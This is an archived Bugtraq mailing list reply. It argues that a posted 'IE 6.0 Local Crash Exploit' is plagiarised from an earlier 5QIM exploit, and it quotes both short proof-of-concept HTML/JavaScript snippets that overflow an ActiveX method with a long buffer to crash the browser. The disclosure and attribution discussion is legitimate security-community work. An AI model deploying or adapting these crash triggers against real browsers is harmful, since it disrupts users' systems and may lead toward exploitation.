Bugtraq mailing list archives
Re: IE 6.0 - Local Crash Exploit
From: Veg <veg () fatsquirrel org>
Date: Tue, 23 Mar 2010 19:16:45 +0000 (GMT)
Spot the difference: ############################################################################################### 5QIM 2.0.0.9 IE Crash Exploit 2008-02-25 08:26<object id="xiaonei" classid="clsid:5C56F4A7-71FC-4FFD-A9D7-18FB87A9DFC6" style="display:none;">
</object>
<script>
function crash() {
var buff = '';
for(i=0;i<=5000;i++) {buff+="AAAAAAAAAA";}
object = document.getElementById("xiaonei");
object.Start5QIMWithItv('test','test',buff);
}
</script>
<pre>
<a href="javascript:;" OnClick="crash()">Crash...</a>
</pre>
###############################################################################################
and:
On Sat, 20 Mar 2010, info () securitylab ir wrote:
###############################################################################################
# Securitylab.ir
###############################################################################################
Vul:
<object id="opi" classid="clsid:5C56F4A7-71FC-4FFD-A9D7-18FB87A9DFC6" style="display:none;">
</object>
<script>
function crash() {
var buff = '';
for(i=0;i<=5000;i++) {buff+="AAAAAAAAAA";}
object = document.getElementById("opi");
object.Start5QIMWithItv('test','test',buff);
}
</script>
<pre>
<a href="javascript:;" OnClick="crash()">.!.</a>
</pre>
###############################################################################################
# IE 6.0 Local Crash Exploit , By: Pouya Daneshmand (whh_iran () yahoo com,Pouya.Securitylab.ir)
###############################################################################################
Yep - the date, the object name and the attribution. http://hi.baidu.com/flyhat/blog/item/64e6a700a59c5015728b6518.html
Current thread:
- IE 6.0 - Local Crash Exploit info (Mar 23)
- Re: IE 6.0 - Local Crash Exploit Veg (Mar 23)
